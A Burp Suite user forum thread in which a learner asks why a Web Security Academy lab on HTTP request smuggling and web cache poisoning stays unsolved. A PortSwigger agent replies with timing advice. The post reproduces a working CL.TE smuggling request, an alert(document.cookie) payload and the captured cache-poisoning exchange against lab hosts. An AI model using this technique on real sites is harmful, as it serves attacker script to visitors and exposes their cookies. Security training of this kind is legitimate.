Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

Unable to solve: Lab: Exploiting HTTP request smuggling to perform web cache poisoning

2lfa | Last updated: Jul 30, 2024 01:37PM UTC

As the title stated, I am unable to solve this lab. I follow the exploit steps, and it works, I manage to poison the cache and get a redirection to my exploit server, so that the alert get executed (even though it's empty). But the lab doesn't get solved!! On exploit server my crafted response looks like this: ------------------------------------------------- HTTP/2 200 OK Content-Type: text/javascript; charset=utf-8 Server: Academy Exploit Server Content-Length: 22 alert(document.cookie) ------------------------------------------------- My exploit looks like the following: ------------------------------------------------- POST / HTTP/1.1 Host: abcdabcdabcdabcdabcdabcdabcdabcde.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 180 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: exploit-exploitexploitexploitexploitexpl.exploit-server.net Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 ------------------------------------------------- After I manage to poison the cache I obtain: ------------------------------------------------- REQUEST ------------------------------------------------- GET /resources/js/tracking.js HTTP/2 Host: abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net Cookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net/ Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin Te: trailers ------------------------------------------------- ------------------------------------------------- RESPONSE ------------------------------------------------- HTTP/2 302 Found Location: https://exploit-exploitexploitexploitexploitexpl.exploit-server.net/post?postId=4 X-Frame-Options: SAMEORIGIN Cache-Control: max-age=30 Age: 8 X-Cache: hit Content-Length: 0 ------------------------------------------------- ------------------------------------------------- REQUEST ------------------------------------------------- GET /post?postId=4 HTTP/2 Host: exploit-exploitexploitexploitexploitexpl.exploit-server.net User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net/ Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site Te: trailers ------------------------------------------------- ------------------------------------------------- RESPONSE ------------------------------------------------- HTTP/2 200 OK Content-Type: text/javascript; charset=utf-8 Server: Academy Exploit Server Content-Length: 22 alert(document.cookie) ------------------------------------------------- Why the lab doesn't get solved even thought I get a redirection to my exploit server and the alert script is executed?!

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 12:15PM UTC

Thanks for getting in touch. I've just been through this lab myself and was able to solve it. You might have to resend the request to poison the cache more than once as you need to time this with when the victim is not only visiting the site but also request the tracking.js file, so it can sometimes be tricky to get the timing right. it would be worth trying this again to see if you have more success a second time around.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.